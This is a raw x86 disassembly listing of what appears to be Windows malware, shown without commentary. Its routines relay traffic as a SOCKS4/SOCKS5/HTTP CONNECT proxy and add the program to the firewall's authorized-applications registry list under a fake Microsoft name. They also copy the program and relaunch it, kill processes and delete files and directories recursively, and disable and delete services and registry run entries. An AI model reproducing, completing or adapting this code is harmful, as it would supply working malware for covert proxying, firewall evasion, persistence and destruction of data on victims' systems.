jz short loc_4026C9
lea eax, [ebp+1F50h+var_CC0]
lea edx, [eax+1]
loc_4026B4: ; CODE XREF: sub_402040+67B�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_4026B4
sub eax, edx
cmp [ebp+eax+1F50h+var_CC1], 0Dh
jnz short loc_4026EE
loc_4026C9: ; CODE XREF: sub_402040+669�j
lea eax, [ebp+1F50h+var_CC0]
lea edx, [eax+1]
loc_4026D2: ; CODE XREF: sub_402040+699�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_4026D2
sub eax, edx
mov [ebp+eax+1F50h+var_CC1], cl
jmp short loc_402670
; ---------------------------------------------------------------------------
loc_4026E6: ; CODE XREF: sub_402040+553�j
add eax, 1
jmp loc_402575
; ---------------------------------------------------------------------------
loc_4026EE: ; CODE XREF: sub_402040+64B�j
; sub_402040+687�j
xor edx, edx
xor edi, edi
mov [ebp+1F50h+var_1F74], edi
loc_4026F5: ; CODE XREF: sub_402040+747�j
mov [ebp+1F50h+var_1F80], edx
lea eax, [ebp+1F50h+var_CC0]
lea esi, [eax+1]
loc_402701: ; CODE XREF: sub_402040+6C8�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402701
sub eax, esi
cmp edx, eax
jnb short loc_40278C
cmp byte ptr [ebp+edx+1F50h+var_CC0], 20h
jnz short loc_402784
mov [ebp+1F50h+var_1F74], 1
loc_402721: ; CODE XREF: sub_402040+74E�j
lea ebx, [ebp+edx+1F50h+var_CC0+1]
xor edx, edx
xor edi, edi
mov [ebp+1F50h+var_1F74], edi
loc_40272F: ; CODE XREF: sub_402040+776�j
mov [ebp+1F50h+var_1F80], edx
mov eax, ebx
lea esi, [eax+1]
loc_402737: ; CODE XREF: sub_402040+6FE�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402737
sub eax, esi
cmp edx, eax
jnb short loc_4027BB
cmp byte ptr [ebx+edx], 20h
jnz short loc_4027B3
mov [ebp+1F50h+var_1F74], 1
loc_402753: ; CODE XREF: sub_402040+77D�j
mov byte ptr [ebx+edx], 0
xor esi, esi
xor edi, edi
mov [ebp+1F50h+var_1F74], edi
loc_40275E: ; CODE XREF: sub_402040+7A8�j
mov [ebp+1F50h+var_1F80], esi
mov eax, ebx
lea edx, [eax+1]
loc_402766: ; CODE XREF: sub_402040+72D�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402766
sub eax, edx
cmp esi, eax
jnb short loc_4027ED
cmp byte ptr [ebx+esi], 3Ah
jnz short loc_4027E5
mov [ebp+1F50h+var_1F74], 1
jmp short loc_4027F1
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402040+6D8�j
add edx, 1
jmp loc_4026F5
; ---------------------------------------------------------------------------
loc_40278C: ; CODE XREF: sub_402040+6CE�j
test edi, edi
jnz short loc_402721
mov ecx, ebx
shl ecx, 4
sub ecx, ebx
lea edx, ds:411EA0h[ecx*4]
push edx
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_4027B3: ; CODE XREF: sub_402040+70A�j
add edx, 1
jmp loc_40272F
; ---------------------------------------------------------------------------
loc_4027BB: ; CODE XREF: sub_402040+704�j
test edi, edi
jnz short loc_402753
loc_4027BF: ; CODE XREF: sub_402040+7AF�j
mov eax, [ebp+1F50h+var_1F6C]
mov ecx, eax
shl ecx, 4
sub ecx, eax
lea edx, ds:411EA0h[ecx*4]
push edx
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_4027E5: ; CODE XREF: sub_402040+739�j
add esi, 1
jmp loc_40275E
; ---------------------------------------------------------------------------
loc_4027ED: ; CODE XREF: sub_402040+733�j
test edi, edi
jz short loc_4027BF
loc_4027F1: ; CODE XREF: sub_402040+742�j
lea eax, [ebx+esi+1]
push eax
call sub_40454B
add esp, 4
movzx ecx, ax
mov byte ptr [ebx+esi], 0
mov [ebp+1F50h+var_1F74], 0
xor eax, eax
loc_40280E: ; CODE XREF: sub_402040+892�j
mov [ebp+1F50h+var_1F70], eax
cmp eax, 32h
jnb loc_4028BA
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jnz loc_4028CF
lea edi, dword_411EA0[esi]
movzx ecx, cx
push ecx
push ebx
push edi
call sub_4014F0
add esp, 0Ch
test eax, eax
jz short loc_402877
mov esi, [ebp+1F50h+var_1F6C]
mov edx, esi
shl edx, 4
sub edx, esi
lea eax, ds:411EA0h[edx*4]
push eax
call sub_401A80
add esp, 4
mov [ebp+1F50h+var_1F74], 1
mov edx, esi
shl edx, 4
sub edx, esi
jmp loc_4023DA
; ---------------------------------------------------------------------------
loc_402877: ; CODE XREF: sub_402040+808�j
mov dword ptr [edi], 2
push 0
call sub_4067A5
mov dword_411EB4[esi], eax
push 0
call sub_4067A5
add esp, 8
mov dword_411EB8[esi], eax
mov ecx, [ebp+1F50h+var_1F6C]
mov eax, ecx
shl eax, 4
sub eax, ecx
add eax, eax
add eax, eax
lea ecx, dword_411EA0[eax]
mov dword_411ED8[esi], ecx
mov dword_411ED8[eax], edi
loc_4028BA: ; CODE XREF: sub_402040+7D4�j
cmp [ebp+1F50h+var_1F74], 0
jz short loc_4028D7
mov esi, [ebp+1F50h+var_1F6C]
mov edx, esi
shl edx, 4
sub edx, esi
jmp loc_4023DA
; ---------------------------------------------------------------------------
loc_4028CF: ; CODE XREF: sub_402040+7EC�j
add eax, 1
jmp loc_40280E
; ---------------------------------------------------------------------------
loc_4028D7: ; CODE XREF: sub_402040+87E�j
mov eax, [ebp+1F50h+var_1F6C]
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
lea edi, dword_411EA0[esi]
mov dword ptr [edi], 29Ah
mov dword_411EA4[esi], 3
mov al, byte ptr [ebp+1F50h+var_CC0]
mov ebx, [ebp+1F50h+var_1F6C]
loc_402904: ; CODE XREF: sub_402040+629�j
cmp al, 5
jnz short loc_40293D
mov byte ptr [ebp+1F50h+var_CC0], al
mov byte ptr [ebp+1F50h+var_CC0+1], 0
push 2
lea ecx, [ebp+1F50h+var_CC0]
push ecx
push edi
call sub_401840
add esp, 0Ch
mov dword ptr [edi], 0Bh
mov dword_411EA4[esi], 5
mov al, byte ptr [ebp+1F50h+var_CC0]
loc_40293D: ; CODE XREF: sub_402040+8C6�j
cmp al, 4
jnz loc_402E18
mov dl, byte ptr [ebp+1F50h+var_CC0+2]
mov byte ptr [ebp+1F50h+var_1F7C+1], dl
mov al, byte ptr [ebp+1F50h+var_CC0+3]
mov byte ptr [ebp+1F50h+var_1F7C], al
push 100h
push 0
lea ecx, [ebp+1F50h+var_104]
push ecx
call sub_403FE0
movzx edx, byte ptr [ebp+1F50h+var_CBC+3]
push edx
movzx eax, byte ptr [ebp+1F50h+var_CBC+2]
push eax
movzx ecx, byte ptr [ebp+1F50h+var_CBC+1]
push ecx
movzx edx, byte ptr [ebp+1F50h+var_CBC]
push edx
push offset aD_D_D_D ; "%d.%d.%d.%d"
lea eax, [ebp+1F50h+var_104]
push eax
call sub_4041B4
add esp, 24h
xor eax, eax
loc_4029A0: ; CODE XREF: sub_402040+A06�j
mov [ebp+1F50h+var_1F70], eax
cmp eax, 32h
jnb short loc_402A18
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jnz loc_402A43
lea edi, dword_411EA0[esi]
movzx ecx, word ptr [ebp+1F50h+var_1F7C]
push ecx
lea edx, [ebp+1F50h+var_104]
push edx
push edi
call sub_4014F0
mov dword ptr [edi], 2
push 0
call sub_4067A5
mov dword_411EB4[esi], eax
push 0
call sub_4067A5
add esp, 14h
mov dword_411EB8[esi], eax
mov eax, ebx
shl eax, 4
sub eax, ebx
add eax, eax
add eax, eax
lea ecx, dword_411EA0[eax]
mov dword_411ED8[esi], ecx
mov dword_411ED8[eax], edi
loc_402A18: ; CODE XREF: sub_402040+966�j
mov eax, ebx
shl eax, 4
sub eax, ebx
add eax, eax
add eax, eax
mov dword_411EA0[eax], 29Ah
mov dword_411EA4[eax], 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402A43: ; CODE XREF: sub_402040+97A�j
add eax, 1
jmp loc_4029A0
; ---------------------------------------------------------------------------
loc_402A4B: ; CODE XREF: sub_402040+30A�j
; sub_402040+325�j
cmp dword ptr [edi], 0Bh
jnz loc_402BD7
lea edx, [ebp+1F50h+var_20A0]
push edx
mov eax, dword_411EA8[esi]
push eax
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz loc_402BD7
push 0BB8h
lea ecx, [ebp+1F50h+var_CC0]
push ecx
push edi
call sub_401A10
add esp, 0Ch
test eax, eax
jz short loc_402A9D
push edi
call sub_401A80
add esp, 4
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402A9D: ; CODE XREF: sub_402040+A46�j
push 100h
push 0
lea edx, [ebp+1F50h+var_104]
push edx
call sub_403FE0
add esp, 0Ch
mov al, byte ptr [ebp+1F50h+var_CC0+3]
cmp al, 1
jnz short loc_402B05
movzx eax, byte ptr [ebp+1F50h+var_CBC+3]
push eax
movzx ecx, byte ptr [ebp+1F50h+var_CBC+2]
push ecx
movzx edx, byte ptr [ebp+1F50h+var_CBC+1]
push edx
movzx eax, byte ptr [ebp+1F50h+var_CBC]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea ecx, [ebp+1F50h+var_104]
push ecx
call sub_4041B4
add esp, 18h
mov dl, [ebp+1F50h+var_CB8]
mov byte ptr [ebp+1F50h+var_1F7C+1], dl
mov al, [ebp+1F50h+var_CB7]
mov byte ptr [ebp+1F50h+var_1F7C], al
jmp short loc_402B3B
; ---------------------------------------------------------------------------
loc_402B05: ; CODE XREF: sub_402040+A7B�j
cmp al, 3
jnz short loc_402B3B
movzx esi, byte ptr [ebp+1F50h+var_CBC]
push esi
lea ecx, [ebp+1F50h+var_CBC+1]
push ecx
lea edx, [ebp+1F50h+var_104]
push edx
call sub_403BE0
add esp, 0Ch
mov al, byte ptr [ebp+esi+1F50h+var_CBC+1]
mov byte ptr [ebp+1F50h+var_1F7C+1], al
mov cl, byte ptr [ebp+esi+1F50h+var_CBC+2]
mov byte ptr [ebp+1F50h+var_1F7C], cl
loc_402B3B: ; CODE XREF: sub_402040+AC3�j
; sub_402040+AC7�j
xor eax, eax
loc_402B3D: ; CODE XREF: sub_402040+B92�j
mov [ebp+1F50h+var_1F70], eax
cmp eax, 32h
jnb short loc_402BB1
mov esi, eax
shl esi, 4
sub esi, eax
add esi, esi
add esi, esi
cmp dword_411EA8[esi], 0
jnz short loc_402BCF
lea edi, dword_411EA0[esi]
movzx edx, word ptr [ebp+1F50h+var_1F7C]
push edx
lea eax, [ebp+1F50h+var_104]
push eax
push edi
call sub_4014F0
mov dword ptr [edi], 2
push 0
call sub_4067A5
mov dword_411EB4[esi], eax
push 0
call sub_4067A5
add esp, 14h
mov dword_411EB8[esi], eax
mov eax, ebx
shl eax, 4
sub eax, ebx
add eax, eax
add eax, eax
lea ecx, dword_411EA0[eax]
mov dword_411ED8[esi], ecx
mov dword_411ED8[eax], edi
loc_402BB1: ; CODE XREF: sub_402040+B03�j
mov edx, ebx
shl edx, 4
sub edx, ebx
mov dword_411EA0[edx*4], 29Ah
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402BCF: ; CODE XREF: sub_402040+B17�j
add eax, 1
jmp loc_402B3D
; ---------------------------------------------------------------------------
loc_402BD7: ; CODE XREF: sub_402040+A0E�j
; sub_402040+A29�j
cmp dword ptr [edi], 2
jnz loc_402D88
push 0
call sub_4067A5
add esp, 4
sub eax, dword_411EB4[esi]
cmp eax, 1
jb loc_402D88
push edi
call sub_401470
mov ebx, eax
mov [ebp+1F50h+var_1F70], ebx
push 0
call sub_4067A5
add esp, 8
mov dword_411EB4[esi], eax
cmp ebx, 2
jz loc_402CF8
push 0
call sub_4067A5
add esp, 4
sub eax, dword_411EB8[esi]
cmp eax, 1Eh
jnb loc_402CF8
test ebx, ebx
jnz loc_402E18
xor eax, eax
mov [ebp+1F50h+var_CC0], eax
mov [ebp+1F50h+var_CBC], eax
mov [ebp+1F50h+var_CB8], al
mov eax, dword_411ED8[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_402C73
mov byte ptr [ebp+1F50h+var_CC0+1], 5Ah
push 8
lea ecx, [ebp+1F50h+var_CC0]
push ecx
push eax
jmp short loc_402CD2
; ---------------------------------------------------------------------------
loc_402C73: ; CODE XREF: sub_402040+C1E�j
cmp ecx, 3
jnz short loc_402C88
push offset aHttp1_0200Conn ; "HTTP/1.0 200 Connection established\r\nPr"...
push eax
call sub_401960
add esp, 8
jmp short loc_402CDA
; ---------------------------------------------------------------------------
loc_402C88: ; CODE XREF: sub_402040+C36�j
cmp ecx, 5
jnz short loc_402CB4
mov byte ptr [ebp+1F50h+var_CC0], cl
mov byte ptr [ebp+1F50h+var_CC0+1], 0
mov byte ptr [ebp+1F50h+var_CC0+2], 0
mov byte ptr [ebp+1F50h+var_CC0+3], 1
push 9
lea edx, [ebp+1F50h+var_CC0]
push edx
push eax
jmp short loc_402CD2
; ---------------------------------------------------------------------------
loc_402CB4: ; CODE XREF: sub_402040+C4B�j
cmp ecx, 6
jnz short loc_402CDA
mov edx, dword_411EC0[esi]
mov eax, edx
lea ebx, [eax+1]
loc_402CC4: ; CODE XREF: sub_402040+C8B�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402CC4
sub eax, ebx
push eax
push edx
push edi
loc_402CD2: ; CODE XREF: sub_402040+C31�j
; sub_402040+C72�j
call sub_401840
add esp, 0Ch
loc_402CDA: ; CODE XREF: sub_402040+C46�j
; sub_402040+C77�j
mov dword ptr [edi], 3
mov eax, dword_411ED8[esi]
mov dword ptr [eax], 3
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402040+BD7�j
; sub_402040+BF0�j
xor eax, eax
mov [ebp+1F50h+var_CC0], eax
mov [ebp+1F50h+var_CBC], eax
mov [ebp+1F50h+var_CB8], al
mov eax, dword_411ED8[esi]
mov ecx, [eax+4]
cmp ecx, 4
jnz short loc_402D2C
mov byte ptr [ebp+1F50h+var_CC0+1], 5Bh
push 8
lea ecx, [ebp+1F50h+var_CC0]
push ecx
jmp short loc_402D73
; ---------------------------------------------------------------------------
loc_402D2C: ; CODE XREF: sub_402040+CD8�j
cmp ecx, 3
jnz short loc_402D4B
push offset aHttp1_0201Unab ; "HTTP/1.0 201 Unable to connect\r\nProxy-a"...
push eax
call sub_401960
add esp, 8
mov eax, dword_411ED8[esi]
push eax
jmp loc_402E0A
; ---------------------------------------------------------------------------
loc_402D4B: ; CODE XREF: sub_402040+CEF�j
cmp ecx, 5
jnz short loc_402D7C
mov byte ptr [ebp+1F50h+var_CC0], cl
mov byte ptr [ebp+1F50h+var_CC0+1], cl
mov byte ptr [ebp+1F50h+var_CC0+2], 0
mov byte ptr [ebp+1F50h+var_CC0+3], 1
push 9
lea edx, [ebp+1F50h+var_CC0]
push edx
loc_402D73: ; CODE XREF: sub_402040+CEA�j
push eax
call sub_401840
add esp, 0Ch
loc_402D7C: ; CODE XREF: sub_402040+D0E�j
mov eax, dword_411ED8[esi]
push eax
jmp loc_402E0A
; ---------------------------------------------------------------------------
loc_402D88: ; CODE XREF: sub_402040+B9A�j
; sub_402040+BB3�j
mov eax, dword_411ED8[esi]
test eax, eax
jz loc_402E18
cmp dword ptr [eax+1Ch], 0
jnz short loc_402E18
mov eax, [edi]
cmp eax, 3
jz short loc_402DAA
cmp eax, 29Ah
jnz short loc_402E18
loc_402DAA: ; CODE XREF: sub_402040+D61�j
lea ecx, [ebp+1F50h+var_20A0]
push ecx
mov edx, dword_411EA8[esi]
push edx
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_402E18
push 0BB8h
lea eax, [ebp+1F50h+var_CC0]
push eax
push edi
call sub_401A10
add esp, 0Ch
test eax, eax
jnz short loc_402E03
mov ecx, dword_411EB0[esi]
push ecx
lea edx, [ebp+1F50h+var_CC0]
push edx
mov eax, dword_411ED8[esi]
push eax
call sub_401840
add esp, 0Ch
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
; ---------------------------------------------------------------------------
loc_402E03: ; CODE XREF: sub_402040+D98�j
mov ecx, dword_411ED8[esi]
push ecx
loc_402E0A: ; CODE XREF: sub_402040+D06�j
; sub_402040+D43�j
call sub_401A80
push edi
call sub_401A80
add esp, 8
loc_402E18: ; CODE XREF: sub_402040+24B�j
; sub_402040+8FF�j ...
add [ebp+1F50h+var_1F6C], 1
mov ebx, [ebp+1F50h+var_1F6C]
jmp loc_402270
sub_402040 endp
; ---------------------------------------------------------------------------
mov edx, [ebp-14h]
push edx
call loc_401F70
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+1F4Ch]
xor ecx, ebp
call sub_403F45
add ebp, 1F50h
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402E60 proc near ; CODE XREF: seg001:004037EA�p
; seg001:00403896�p
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
sub esp, 20Ch
mov eax, dword_410440
xor eax, esp
mov [esp+20Ch+var_4], eax
lea eax, [esp+20Ch+var_20C]
push eax
push 20006h
push 0
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call dword_40D038 ; RegOpenKeyExA
test eax, eax
jnz short loc_402EFD
push 104h
lea ecx, [esp+210h+var_108]
push ecx
push eax
call dword_40D0E0 ; GetModuleFileNameA
push offset aMicrosoftRWind ; "Microsoft (R) Windows Protocol Deployme"...
lea edx, [esp+210h+var_108]
push edx
push offset aSEnabledS ; "%s:*:Enabled:%s"
lea eax, [esp+218h+var_208]
push 100h
push eax
call sub_40481B
lea eax, [esp+220h+var_208]
add esp, 14h
lea edx, [eax+1]
loc_402ED2: ; CODE XREF: sub_402E60+79�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_402ED2
sub eax, edx
add eax, 1
push eax
mov eax, [esp+210h+var_20C]
lea ecx, [esp+210h+var_208]
push ecx
push 1
push 0
lea edx, [esp+21Ch+var_108]
push edx
push eax
call dword_40D03C ; RegSetValueExA
loc_402EFD: ; CODE XREF: sub_402E60+31�j
mov ecx, [esp+20Ch+var_20C]
push ecx
call dword_40D040 ; RegCloseKey
mov ecx, [esp+20Ch+var_4]
xor ecx, esp
call sub_403F45
add esp, 20Ch
retn
sub_402E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F20 proc near ; CODE XREF: sub_4038C0+83�p
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_244 = word ptr -244h
var_224 = byte ptr -224h
var_220 = word ptr -220h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 260h
mov eax, dword_410440
xor eax, esp
mov [esp+260h+var_4], eax
push esi
mov esi, [esp+264h+arg_0]
push edi
mov edi, [esp+268h+arg_4]
push 104h
lea eax, [esp+26Ch+var_108]
push eax
push 0
call dword_40D0E0 ; GetModuleFileNameA
push edi
push esi
push offset aSS ; "%s\\%s"
lea ecx, [esp+274h+var_20C]
push 104h
push ecx
call sub_40481B
add esp, 14h
push esi
call dword_40D0C0 ; SetCurrentDirectoryA
test eax, eax
jnz short loc_402F85
push eax
push esi
call dword_40D0C4 ; CreateDirectoryA
loc_402F85: ; CODE XREF: sub_402F20+5B�j
push 0
lea edx, [esp+26Ch+var_20C]
push edx
lea eax, [esp+270h+var_108]
push eax
call dword_40D0C8 ; CopyFileA
xor eax, eax
push 44h
push eax
lea ecx, [esp+270h+var_250]
push ecx
mov [esp+274h+var_260], eax
mov [esp+274h+var_25C], eax
mov [esp+274h+var_258], eax
mov [esp+274h+var_254], eax
call sub_403FE0
add esp, 0Ch
lea edx, [esp+268h+var_260]
push edx
lea eax, [esp+26Ch+var_250]
push eax
push esi
push 0
push 28h
push 1
push 0
push 0
push 0
lea ecx, [esp+28Ch+var_20C]
push ecx
mov dword ptr [esp+290h+var_244], 0
mov [esp+290h+var_250], 44h
mov dword ptr [esp+290h+var_224], 1
mov [esp+290h+var_220], 0
call dword_40D0CC ; CreateProcessA
test eax, eax
jz short loc_403020
mov edx, [esp+268h+var_260]
mov esi, dword_40D0D0
push edx
call esi ; CloseHandle
mov eax, [esp+268h+var_25C]
push eax
call esi ; CloseHandle
push 0
call dword_40D0D4 ; ExitProcess
loc_403020: ; CODE XREF: sub_402F20+E2�j
mov ecx, [esp+268h+var_4]
pop edi
pop esi
xor ecx, esp
call sub_403F45
add esp, 260h
retn
sub_402F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403040 proc near ; CODE XREF: sub_403150+DE�p
; seg001:004032C7�p ...
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_220 = dword ptr -220h
var_100 = byte ptr -100h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 234h
mov eax, dword_410440
xor eax, esp
mov [esp+234h+var_4], eax
mov eax, [esp+234h+arg_0]
push ebx
push ebp
push 0
push 2
mov [esp+244h+var_234], eax
mov [esp+244h+var_230], 128h
call sub_4039FA ; CreateToolhelp32Snapshot
mov ebx, dword_40D0D0
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_403127
lea ecx, [esp+23Ch+var_230]
push ecx
push ebp
call sub_4039F4 ; Process32First
test eax, eax
jz loc_403127
push esi
push edi
mov edi, dword_40D0AC
mov edi, edi
loc_4030A0: ; CODE XREF: sub_403040+DF�j
mov edx, [esp+244h+var_228]
push edx
push 0
push 410h
call edi ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_40310F
push 104h
lea eax, [esp+240h+var_100]
push eax
push 0
push esi
call sub_403A72
mov ecx, [esp+23Ch+var_22C]
push ecx
lea edx, [esp+240h+var_100]
push edx
call sub_404A52
add esp, 8
test eax, eax
jnz short loc_40310F
push esi
call ebx ; CloseHandle
mov eax, [esp+23Ch+var_220]
push eax
push 0
push 100001h
call edi ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_40310F
push 0
push esi
call dword_40D0B0 ; TerminateProcess
test eax, eax
jz short loc_40310F
push 0FFFFFFFFh
push esi
call dword_40D0B4 ; WaitForSingleObject
loc_40310F: ; CODE XREF: sub_403040+72�j
; sub_403040+A0�j ...
push esi
call ebx ; CloseHandle
lea ecx, [esp+23Ch+var_228]
push ecx
push ebp
call sub_4039EE ; Process32Next
test eax, eax
jnz loc_4030A0
pop edi
pop esi
loc_403127: ; CODE XREF: sub_403040+3D�j
; sub_403040+50�j
push ebp
call ebx ; CloseHandle
mov edx, [esp+23Ch+var_234]
push edx
call dword_40D0BC ; DeleteFileA
mov ecx, [esp+23Ch+var_4]
pop ebp
pop ebx
xor ecx, esp
call sub_403F45
add esp, 234h
retn
sub_403040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403150 proc near ; CODE XREF: sub_403150+B2�p
var_34C = byte ptr -34Ch
var_320 = byte ptr -320h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 34Ch
mov eax, dword_410440
xor eax, esp
mov [esp+34Ch+var_4], eax
push ebp
push esi
mov esi, [esp+354h+arg_0]
push edi
push esi
push offset aS ; "%s\\*"
lea eax, [esp+360h+var_108]
push 104h
push eax
xor ebp, ebp
call sub_40481B
add esp, 10h
lea ecx, [esp+358h+var_34C]
push ecx
lea edx, [esp+35Ch+var_108]
push edx
call dword_40D05C ; FindFirstFileA
mov edi, eax
test edi, edi
jz loc_40324B
lea eax, [esp+358h+var_34C]
push eax
push edi
call dword_40D058 ; FindNextFileA
test eax, eax
jz loc_40324B
push ebx
mov ebx, dword_40D054
loc_4031C3: ; CODE XREF: sub_403150+F4�j
add ebp, 1
cmp ebp, 1
jle short loc_403236
lea ecx, [esp+35Ch+var_320]
push ecx
push esi
push offset aSS_0 ; "%s\\%s"
lea edx, [esp+368h+var_20C]
push 104h
push edx
call sub_40481B
add esp, 14h
lea eax, [esp+35Ch+var_20C]
push eax
call ebx ; GetFileAttributesA
cmp eax, 10h
jnz short loc_403209
lea ecx, [esp+35Ch+var_20C]
push ecx
call sub_403150
jmp short loc_403233
; ---------------------------------------------------------------------------
loc_403209: ; CODE XREF: sub_403150+A8�j
lea edx, [esp+35Ch+var_20C]
push edx
call dword_40D0BC ; DeleteFileA
test eax, eax
jnz short loc_403236
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_403236
lea eax, [esp+35Ch+var_20C]
push eax
call sub_403040
loc_403233: ; CODE XREF: sub_403150+B7�j
add esp, 4
loc_403236: ; CODE XREF: sub_403150+79�j
; sub_403150+C9�j ...
lea ecx, [esp+35Ch+var_34C]
push ecx
push edi
call dword_40D058 ; FindNextFileA
test eax, eax
jnz loc_4031C3
pop ebx
loc_40324B: ; CODE XREF: sub_403150+52�j
; sub_403150+66�j
push edi
call dword_40D04C ; FindClose
push esi
call dword_40D07C ; RemoveDirectoryA
mov ecx, [esp+358h+var_4]
pop edi
pop esi
pop ebp
xor ecx, esp
call sub_403F45
add esp, 34Ch
retn
sub_403150 endp
; ---------------------------------------------------------------------------
align 10h
sub esp, 20Ch
mov eax, dword_410440
xor eax, esp
mov [esp+208h], eax
push 104h
lea eax, [esp+4]
push eax
call dword_40D060 ; GetWindowsDirectoryA
lea ecx, [esp]
push ecx
push offset aSWinsockServic ; "%s\\winsock\\services.exe"
lea edx, [esp+10Ch]
push 104h
push edx
call sub_40481B
lea eax, [esp+114h]
push eax
call sub_403040
mov ecx, [esp+21Ch]
add esp, 14h
xor ecx, esp
call sub_403F45
add esp, 20Ch
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4032F0 proc near ; CODE XREF: sub_4036D0+5�p
; sub_4036D0+F�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push 0F003Fh
push 0
push 0
call dword_40D01C ; OpenSCManagerA
mov ebp, dword_40D020
mov ebx, eax
test ebx, ebx
jz short loc_40338C
mov eax, [esp+8+arg_0]
push esi
push 10023h
push eax
push ebx
call dword_40D024 ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_403388
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push esi
call dword_40D028 ; ChangeServiceConfigA
push 0
push 1
push esi
call dword_40D02C ; ControlService
push esi
call dword_40D030 ; DeleteService
push 1000h
push 40h
call dword_40D068 ; LocalAlloc
push 0
push 1000h
mov edi, eax
push edi
push esi
call dword_40D034 ; QueryServiceConfigA
cmp eax, 1
jnz short loc_403380
mov ecx, [edi+0Ch]
push ecx
call dword_40D0BC ; DeleteFileA
loc_403380: ; CODE XREF: sub_4032F0+84�j
push edi
call dword_40D064 ; LocalFree
pop edi
loc_403388: ; CODE XREF: sub_4032F0+33�j
push esi
call ebp ; CloseServiceHandle
pop esi
loc_40338C: ; CODE XREF: sub_4032F0+1B�j
push ebx
call ebp ; CloseServiceHandle
pop ebp
pop ebx
retn
sub_4032F0 endp
; ---------------------------------------------------------------------------
align 10h
sub esp, 110h
mov eax, dword_410440
xor eax, esp
mov [esp+10Ch], eax
mov ecx, [esp+118h]
mov eax, [esp+114h]
push esi
mov esi, [esp+120h]
lea edx, [esp+4]
push edx
push 0F003Fh
push 0
push ecx
push eax
mov dword ptr [esp+1Ch], 104h
call dword_40D038 ; RegOpenKeyExA
test eax, eax
jnz short loc_403421
mov edx, [esp+4]
lea eax, [esp+8]
push eax
lea ecx, [esp+10h]
push ecx
push 0
push 0
push esi
push edx
call dword_40D014 ; RegQueryValueExA
test eax, eax
jnz short loc_403421
mov eax, [esp+4]
push esi
push eax
call dword_40D018 ; RegDeleteValueA
lea ecx, [esp+0Ch]
push ecx
call sub_403040
add esp, 4
loc_403421: ; CODE XREF: seg001:004033E8�j
; seg001:00403406�j
mov edx, [esp+4]
push edx
call dword_40D040 ; RegCloseKey
mov ecx, [esp+110h]
pop esi
xor ecx, esp
call sub_403F45
add esp, 110h
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403450 proc near ; CODE XREF: sub_4038C0+100�p
arg_0 = dword ptr 4
push ebx
push edi
push 10000000h
push 0
push 0
call dword_40D01C ; OpenSCManagerA
mov ebx, dword_40D020
mov edi, eax
test edi, edi
jz short loc_4034AC
mov eax, [esp+8+arg_0]
push esi
push 12h
push eax
push edi
call dword_40D024 ; OpenServiceA
mov esi, eax
